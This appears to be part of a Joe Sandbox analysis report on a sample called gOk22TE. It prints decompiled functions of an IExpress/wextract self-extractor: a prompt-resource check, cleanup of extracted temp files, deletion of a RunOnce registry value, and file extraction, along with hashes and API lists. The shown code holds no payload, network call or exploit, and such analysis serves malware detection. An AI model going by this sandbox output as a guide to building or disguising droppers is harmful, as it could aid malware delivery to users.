                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3183975587-0
                                                                                                                                                                                                                                                • Opcode ID: a339ef117bee2d34e4715199f0b2a0a299b5ab62e34ce1b4857dab86e35af7b4
                                                                                                                                                                                                                                                • Instruction ID: c9a7ca6f3d69e3b098b3ddce46bad10dbc1a1961632d82b46650e771452c72f0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a339ef117bee2d34e4715199f0b2a0a299b5ab62e34ce1b4857dab86e35af7b4
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D3319E31640208AFEB709B67DC4CFAB7BF8EBD8B10F1001A9F685D6191C63688858B50
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E51E5 Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 74memoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 652 10e51e5-10e520b call 10e468f LocalAlloc 655 10e522d-10e523c call 10e468f 652->655 656 10e520d-10e5228 call 10e44b9 call 10e6285 652->656 661 10e523e-10e5260 call 10e44b9 LocalFree 655->661 662 10e5262-10e5270 lstrcmpA 655->662 671 10e52b0 656->671 661->671 665 10e527e-10e529c call 10e44b9 LocalFree 662->665 666 10e5272-10e5273 LocalFree 662->666 674 10e529e-10e52a4 665->674 675 10e52a6 665->675 669 10e5279-10e527c 666->669 672 10e52b2-10e52b5 669->672 671->672 674->669 675->671
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E010E51E5(void* __eflags) {
				int _t5;
				void* _t6;
				void* _t28;

				_t1 = E010E468F("UPROMPT", 0, 0) + 1; // 0x1
				_t28 = LocalAlloc(0x40, _t1);
				if(_t28 != 0) {
					if(E010E468F("UPROMPT", _t28, _t29) != 0) {
						_t5 = lstrcmpA(_t28, "<None>"); // executed
						if(_t5 != 0) {
							_t6 = E010E44B9(0, 0x3e9, _t28, 0, 0x20, 4);
							LocalFree(_t28);
							if(_t6 != 6) {
								 *0x10e9124 = 0x800704c7;
								L10:
								return 0;
							}
							 *0x10e9124 = 0;
							L6:
							return 1;
						}
						LocalFree(_t28);
						goto L6;
					}
					E010E44B9(0, 0x4b1, 0, 0, 0x10, 0);
					LocalFree(_t28);
					 *0x10e9124 = 0x80070714;
					goto L10;
				}
				E010E44B9(0, 0x4b5, 0, 0, 0x10, 0);
				 *0x10e9124 = E010E6285();
				goto L10;
			}






                                                                                                                                                                                                                                                0x010e51fb
                                                                                                                                                                                                                                                0x010e5207
                                                                                                                                                                                                                                                0x010e520b
                                                                                                                                                                                                                                                0x010e523c
                                                                                                                                                                                                                                                0x010e5268
                                                                                                                                                                                                                                                0x010e5270
                                                                                                                                                                                                                                                0x010e528b
                                                                                                                                                                                                                                                0x010e5293
                                                                                                                                                                                                                                                0x010e529c
                                                                                                                                                                                                                                                0x010e52a6
                                                                                                                                                                                                                                                0x010e52b0
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e52b0
                                                                                                                                                                                                                                                0x010e529e
                                                                                                                                                                                                                                                0x010e5279
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e527b
                                                                                                                                                                                                                                                0x010e5273
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5273
                                                                                                                                                                                                                                                0x010e524a
                                                                                                                                                                                                                                                0x010e5250
                                                                                                                                                                                                                                                0x010e5256
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e5256
                                                                                                                                                                                                                                                0x010e5219
                                                                                                                                                                                                                                                0x010e5223
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46A0
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: SizeofResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46A9
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 010E46C3
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: LoadResource.KERNEL32(00000000,00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46CC
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: LockResource.KERNEL32(00000000,?,010E2D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46D3
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: memcpy_s.MSVCRT ref: 010E46E5
                                                                                                                                                                                                                                                  • Part of subcall function 010E468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 010E46EF
                                                                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,010E2F4D,?,00000002,00000000), ref: 010E5201
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 010E5250
                                                                                                                                                                                                                                                  • Part of subcall function 010E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010E4518
                                                                                                                                                                                                                                                  • Part of subcall function 010E44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 010E4554
                                                                                                                                                                                                                                                  • Part of subcall function 010E6285: GetLastError.KERNEL32(010E5BBC), ref: 010E6285
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                                • String ID: <None>$UPROMPT
                                                                                                                                                                                                                                                • API String ID: 957408736-2980973527
                                                                                                                                                                                                                                                • Opcode ID: 9669a2a982c3f5bb1b1a974f5824fd3355ae463faeaf561fa05f313489acdecc
                                                                                                                                                                                                                                                • Instruction ID: 2ef279feae4561338a3073a1ec9ca435e35867b0030113018d811bd1d303ef90
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9669a2a982c3f5bb1b1a974f5824fd3355ae463faeaf561fa05f313489acdecc
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B11B6B5700201EFD3756B779C4CB7B65DDEB8DB98B00486DB6C2DA284DA7ECC014224
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E52B6 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 65fileCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 74%
                                                                                                                                                                                                                                                			E010E52B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
				signed int _v8;
				char _v268;
				signed int _t9;
				signed int _t11;
				void* _t21;
				void* _t29;
				CHAR** _t31;
				void* _t32;
				signed int _t33;

				_t28 = __edi;
				_t22 = __ecx;
				_t21 = __ebx;
				_t9 =  *0x10e8004; // 0x71a8563c
				_v8 = _t9 ^ _t33;
				_push(__esi);
				_t31 =  *0x10e91e0; // 0xdb8f30
				if(_t31 != 0) {
					_push(__edi);
					do {
						_t29 = _t31;
						if( *0x10e8a24 == 0 &&  *0x10e9a30 == 0) {
							SetFileAttributesA( *_t31, 0x80); // executed
							DeleteFileA( *_t31); // executed
						}
						_t31 = _t31[1];
						LocalFree( *_t29);
						LocalFree(_t29);
					} while (_t31 != 0);
					_pop(_t28);
				}
				_t11 =  *0x10e8a20; // 0x0
				_pop(_t32);
				if(_t11 != 0 &&  *0x10e8a24 == 0 &&  *0x10e9a30 == 0) {
					_push(_t22);
					E010E1781( &_v268, 0x104, _t22, "C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\");
					if(( *0x10e9a34 & 0x00000020) != 0) {
						E010E65E8( &_v268);
					}
					SetCurrentDirectoryA(".."); // executed
					_t22 =  &_v268;
					E010E2390( &_v268);
					_t11 =  *0x10e8a20; // 0x0
				}
				if( *0x10e9a40 != 1 && _t11 != 0) {
					_t11 = E010E1FE1(_t22); // executed
				}
				 *0x10e8a20 =  *0x10e8a20 & 0x00000000;
				return E010E6CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
			}












                                                                                                                                                                                                                                                0x010e52b6
                                                                                                                                                                                                                                                0x010e52b6
                                                                                                                                                                                                                                                0x010e52b6
                                                                                                                                                                                                                                                0x010e52c1
                                                                                                                                                                                                                                                0x010e52c8
                                                                                                                                                                                                                                                0x010e52cb
                                                                                                                                                                                                                                                0x010e52cc
                                                                                                                                                                                                                                                0x010e52d4
                                                                                                                                                                                                                                                0x010e52d6
                                                                                                                                                                                                                                                0x010e52d7
                                                                                                                                                                                                                                                0x010e52de
                                                                                                                                                                                                                                                0x010e52e0
                                                                                                                                                                                                                                                0x010e52f2
                                                                                                                                                                                                                                                0x010e52fa
                                                                                                                                                                                                                                                0x010e52fa
                                                                                                                                                                                                                                                0x010e5302
                                                                                                                                                                                                                                                0x010e5305
                                                                                                                                                                                                                                                0x010e530c
                                                                                                                                                                                                                                                0x010e5312
                                                                                                                                                                                                                                                0x010e5316
                                                                                                                                                                                                                                                0x010e5316
                                                                                                                                                                                                                                                0x010e5317
                                                                                                                                                                                                                                                0x010e531c
                                                                                                                                                                                                                                                0x010e531f
                                                                                                                                                                                                                                                0x010e5333
                                                                                                                                                                                                                                                0x010e5345
                                                                                                                                                                                                                                                0x010e5351
                                                                                                                                                                                                                                                0x010e5359
                                                                                                                                                                                                                                                0x010e5359
                                                                                                                                                                                                                                                0x010e5363
                                                                                                                                                                                                                                                0x010e5369
                                                                                                                                                                                                                                                0x010e536f
                                                                                                                                                                                                                                                0x010e5374
                                                                                                                                                                                                                                                0x010e5374
                                                                                                                                                                                                                                                0x010e5381
                                                                                                                                                                                                                                                0x010e5387
                                                                                                                                                                                                                                                0x010e5387
                                                                                                                                                                                                                                                0x010e538f
                                                                                                                                                                                                                                                0x010e53a0

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SetFileAttributesA.KERNELBASE(00DB8F30,00000080,?,00000000), ref: 010E52F2
                                                                                                                                                                                                                                                • DeleteFileA.KERNELBASE(00DB8F30), ref: 010E52FA
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00DB8F30,?,00000000), ref: 010E5305
                                                                                                                                                                                                                                                • LocalFree.KERNEL32(00DB8F30), ref: 010E530C
                                                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNELBASE(010E11FC,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 010E5363
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 010E5334
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
                                                                                                                                                                                                                                                • API String ID: 2833751637-256195474
                                                                                                                                                                                                                                                • Opcode ID: 96b203831fb1960b7202a10014b8f0346ef4fc179f17a927333348c2a2913e9e
                                                                                                                                                                                                                                                • Instruction ID: 518f765314901b669bb77b40eb445f9db83545d19d8411b4a860956d17957d86
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 96b203831fb1960b7202a10014b8f0346ef4fc179f17a927333348c2a2913e9e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3721C635600214DFEB719B27ED0C7697BF4BB14B18F08859EF9C15B198CBBA9984CB80
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E1FE1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 23registryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E010E1FE1(void* __ecx) {
				void* _v8;
				long _t4;

				if( *0x10e8530 != 0) {
					_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
					if(_t4 == 0) {
						RegDeleteValueA(_v8, "wextract_cleanup3"); // executed
						return RegCloseKey(_v8);
					}
				}
				return _t4;
			}





                                                                                                                                                                                                                                                0x010e1fee
                                                                                                                                                                                                                                                0x010e2005
                                                                                                                                                                                                                                                0x010e200d
                                                                                                                                                                                                                                                0x010e2017
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e2020
                                                                                                                                                                                                                                                0x010e200d
                                                                                                                                                                                                                                                0x010e2029

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,010E538C,?,?,010E538C), ref: 010E2005
                                                                                                                                                                                                                                                • RegDeleteValueA.KERNELBASE(010E538C,wextract_cleanup3,?,?,010E538C), ref: 010E2017
                                                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(010E538C,?,?,010E538C), ref: 010E2020
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseDeleteOpenValue
                                                                                                                                                                                                                                                • String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup3
                                                                                                                                                                                                                                                • API String ID: 849931509-2968168367
                                                                                                                                                                                                                                                • Opcode ID: f2616b52fe28089c11bf884faa9ea05e27ac0eee436b6c963d611922a019bb27
                                                                                                                                                                                                                                                • Instruction ID: 3330ef93976aacdf2493b695b039fd2637ca96a8db1002e202aeabf09e7184da
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f2616b52fe28089c11bf884faa9ea05e27ac0eee436b6c963d611922a019bb27
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B7E04831650314FFD7319A93EC4EF597FEDE704B80F100195B98465056D7665A14D704
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E4CD0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 94%
                                                                                                                                                                                                                                                			E010E4CD0(char* __edx, long _a4, int _a8) {
				signed int _v8;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t29;
				int _t30;
				long _t32;
				signed int _t33;
				long _t35;
				long _t36;
				struct HWND__* _t37;
				long _t38;
				long _t39;
				long _t41;
				long _t44;
				long _t45;
				long _t46;
				signed int _t50;
				long _t51;
				char* _t58;
				long _t59;
				char* _t63;
				long _t64;
				CHAR* _t71;
				CHAR* _t74;
				int _t75;
				signed int _t76;

				_t69 = __edx;
				_t29 =  *0x10e8004; // 0x71a8563c
				_t30 = _t29 ^ _t76;
				_v8 = _t30;
				_t75 = _a8;
				if( *0x10e91d8 == 0) {
					_t32 = _a4;
					__eflags = _t32;
					if(_t32 == 0) {
						_t33 = E010E4E99(_t75);
						L35:
						return E010E6CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
					}
					_t35 = _t32 - 1;
					__eflags = _t35;
					if(_t35 == 0) {
						L9:
						_t33 = 0;
						goto L35;
					}
					_t36 = _t35 - 1;
					__eflags = _t36;
					if(_t36 == 0) {
						_t37 =  *0x10e8584; // 0x0
						__eflags = _t37;
						if(_t37 != 0) {
							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
						}
						_t54 = 0x10e91e4;
						_t58 = 0x10e91e4;
						do {
							_t38 =  *_t58;
							_t58 =  &(_t58[1]);
							__eflags = _t38;
						} while (_t38 != 0);
						_t59 = _t58 - 0x10e91e5;
						__eflags = _t59;
						_t71 =  *(_t75 + 4);
						_t73 =  &(_t71[1]);
						do {
							_t39 =  *_t71;
							_t71 =  &(_t71[1]);
							__eflags = _t39;
						} while (_t39 != 0);
						_t69 = _t71 - _t73;
						_t30 = _t59 + 1 + _t71 - _t73;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							L3:
							_t33 = _t30 | 0xffffffff;
							goto L35;
						}
						_t69 = 0x10e91e4;
						_t30 = E010E4702( &_v268, 0x10e91e4,  *(_t75 + 4));
						__eflags = _t30;
						if(__eflags == 0) {
							goto L3;
						}
						_t41 = E010E476D( &_v268, __eflags);
						__eflags = _t41;
						if(_t41 == 0) {
							goto L9;
						}
						_push(0x180);
						_t30 = E010E4980( &_v268, 0x8302); // executed
						_t75 = _t30;
						__eflags = _t75 - 0xffffffff;
						if(_t75 == 0xffffffff) {
							goto L3;
						}
						_t30 = E010E47E0( &_v268);
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						 *0x10e93f4 =  *0x10e93f4 + 1;
						_t33 = _t75;
						goto L35;
					}
					_t44 = _t36 - 1;
					__eflags = _t44;
					if(_t44 == 0) {
						_t54 = 0x10e91e4;
						_t63 = 0x10e91e4;
						do {
							_t45 =  *_t63;
							_t63 =  &(_t63[1]);
							__eflags = _t45;
						} while (_t45 != 0);
						_t74 =  *(_t75 + 4);
						_t64 = _t63 - 0x10e91e5;
						__eflags = _t64;
						_t69 =  &(_t74[1]);
						do {
							_t46 =  *_t74;
							_t74 =  &(_t74[1]);
							__eflags = _t46;
						} while (_t46 != 0);
						_t73 = _t74 - _t69;
						_t30 = _t64 + 1 + _t74 - _t69;
						__eflags = _t30 - 0x104;
						if(_t30 >= 0x104) {
							goto L3;
						}
						_t69 = 0x10e91e4;
						_t30 = E010E4702( &_v268, 0x10e91e4,  *(_t75 + 4));
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						_t69 =  *((intOrPtr*)(_t75 + 0x18));
						_t30 = E010E4C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						}
						E010E4B60( *((intOrPtr*)(_t75 + 0x14))); // executed
						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
						__eflags = _t50;
						if(_t50 != 0) {
							_t51 = _t50 & 0x00000027;
							__eflags = _t51;
						} else {
							_t51 = 0x80;
						}
						_t30 = SetFileAttributesA( &_v268, _t51); // executed
						__eflags = _t30;
						if(_t30 == 0) {
							goto L3;
						} else {
							_t33 = 1;
							goto L35;
						}
					}
					_t30 = _t44 - 1;
					__eflags = _t30;
					if(_t30 == 0) {
						goto L3;
					}
					goto L9;
				}
				if(_a4 == 3) {
					_t30 = E010E4B60( *((intOrPtr*)(_t75 + 0x14)));
				}
				goto L3;
			}































                                                                                                                                                                                                                                                0x010e4cd0
                                                                                                                                                                                                                                                0x010e4cdb
                                                                                                                                                                                                                                                0x010e4ce0
                                                                                                                                                                                                                                                0x010e4ce2
                                                                                                                                                                                                                                                0x010e4cee
                                                                                                                                                                                                                                                0x010e4cf2
                                                                                                                                                                                                                                                0x010e4d0e
                                                                                                                                                                                                                                                0x010e4d0e
                                                                                                                                                                                                                                                0x010e4d11
                                                                                                                                                                                                                                                0x010e4e83
                                                                                                                                                                                                                                                0x010e4e88
                                                                                                                                                                                                                                                0x010e4e98
                                                                                                                                                                                                                                                0x010e4e98
                                                                                                                                                                                                                                                0x010e4d17
                                                                                                                                                                                                                                                0x010e4d17
                                                                                                                                                                                                                                                0x010e4d1a
                                                                                                                                                                                                                                                0x010e4d2f
                                                                                                                                                                                                                                                0x010e4d2f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e4d2f
                                                                                                                                                                                                                                                0x010e4d1c
                                                                                                                                                                                                                                                0x010e4d1c
                                                                                                                                                                                                                                                0x010e4d1f
                                                                                                                                                                                                                                                0x010e4dcb
                                                                                                                                                                                                                                                0x010e4dd0
                                                                                                                                                                                                                                                0x010e4dd2
                                                                                                                                                                                                                                                0x010e4ddd
                                                                                                                                                                                                                                                0x010e4ddd
                                                                                                                                                                                                                                                0x010e4de3
                                                                                                                                                                                                                                                0x010e4de8
                                                                                                                                                                                                                                                0x010e4ded
                                                                                                                                                                                                                                                0x010e4ded
                                                                                                                                                                                                                                                0x010e4def
                                                                                                                                                                                                                                                0x010e4df0
                                                                                                                                                                                                                                                0x010e4df0
                                                                                                                                                                                                                                                0x010e4df4
                                                                                                                                                                                                                                                0x010e4df4
                                                                                                                                                                                                                                                0x010e4df6
                                                                                                                                                                                                                                                0x010e4df9
                                                                                                                                                                                                                                                0x010e4dfc
                                                                                                                                                                                                                                                0x010e4dfc
                                                                                                                                                                                                                                                0x010e4dfe
                                                                                                                                                                                                                                                0x010e4dff
                                                                                                                                                                                                                                                0x010e4dff
                                                                                                                                                                                                                                                0x010e4e03
                                                                                                                                                                                                                                                0x010e4e08
                                                                                                                                                                                                                                                0x010e4e0a
                                                                                                                                                                                                                                                0x010e4e0f
                                                                                                                                                                                                                                                0x010e4d03
                                                                                                                                                                                                                                                0x010e4d03
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e4d03
                                                                                                                                                                                                                                                0x010e4e18
                                                                                                                                                                                                                                                0x010e4e20
                                                                                                                                                                                                                                                0x010e4e25
                                                                                                                                                                                                                                                0x010e4e27
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e4e33
                                                                                                                                                                                                                                                0x010e4e38
                                                                                                                                                                                                                                                0x010e4e3a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e4e40
                                                                                                                                                                                                                                                0x010e4e51
                                                                                                                                                                                                                                                0x010e4e56
                                                                                                                                                                                                                                                0x010e4e5b
                                                                                                                                                                                                                                                0x010e4e5e
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e4e6a
                                                                                                                                                                                                                                                0x010e4e6f
                                                                                                                                                                                                                                                0x010e4e71
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e4e77
                                                                                                                                                                                                                                                0x010e4e7d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e4e7d
                                                                                                                                                                                                                                                0x010e4d25
                                                                                                                                                                                                                                                0x010e4d25
                                                                                                                                                                                                                                                0x010e4d28
                                                                                                                                                                                                                                                0x010e4d36
                                                                                                                                                                                                                                                0x010e4d3b
                                                                                                                                                                                                                                                0x010e4d40
                                                                                                                                                                                                                                                0x010e4d40
                                                                                                                                                                                                                                                0x010e4d42
                                                                                                                                                                                                                                                0x010e4d43
                                                                                                                                                                                                                                                0x010e4d43
                                                                                                                                                                                                                                                0x010e4d47
                                                                                                                                                                                                                                                0x010e4d4a
                                                                                                                                                                                                                                                0x010e4d4a
                                                                                                                                                                                                                                                0x010e4d4c
                                                                                                                                                                                                                                                0x010e4d4f
                                                                                                                                                                                                                                                0x010e4d4f
                                                                                                                                                                                                                                                0x010e4d51
                                                                                                                                                                                                                                                0x010e4d52
                                                                                                                                                                                                                                                0x010e4d52
                                                                                                                                                                                                                                                0x010e4d56
                                                                                                                                                                                                                                                0x010e4d5b
                                                                                                                                                                                                                                                0x010e4d5d
                                                                                                                                                                                                                                                0x010e4d62
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e4d67
                                                                                                                                                                                                                                                0x010e4d6f
                                                                                                                                                                                                                                                0x010e4d74
                                                                                                                                                                                                                                                0x010e4d76
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e4d7c
                                                                                                                                                                                                                                                0x010e4d84
                                                                                                                                                                                                                                                0x010e4d89
                                                                                                                                                                                                                                                0x010e4d8b
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e4d94
                                                                                                                                                                                                                                                0x010e4d99
                                                                                                                                                                                                                                                0x010e4d9e
                                                                                                                                                                                                                                                0x010e4da1
                                                                                                                                                                                                                                                0x010e4daa
                                                                                                                                                                                                                                                0x010e4daa
                                                                                                                                                                                                                                                0x010e4da3
                                                                                                                                                                                                                                                0x010e4da3
                                                                                                                                                                                                                                                0x010e4da3
                                                                                                                                                                                                                                                0x010e4db5
                                                                                                                                                                                                                                                0x010e4dbb
                                                                                                                                                                                                                                                0x010e4dbd
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e4dc3
                                                                                                                                                                                                                                                0x010e4dc5
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e4dc5
                                                                                                                                                                                                                                                0x010e4dbd
                                                                                                                                                                                                                                                0x010e4d2a
                                                                                                                                                                                                                                                0x010e4d2a
                                                                                                                                                                                                                                                0x010e4d2d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e4d2d
                                                                                                                                                                                                                                                0x010e4cf8
                                                                                                                                                                                                                                                0x010e4cfd
                                                                                                                                                                                                                                                0x010e4d02
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 010E4DB5
                                                                                                                                                                                                                                                • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 010E4DDD
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
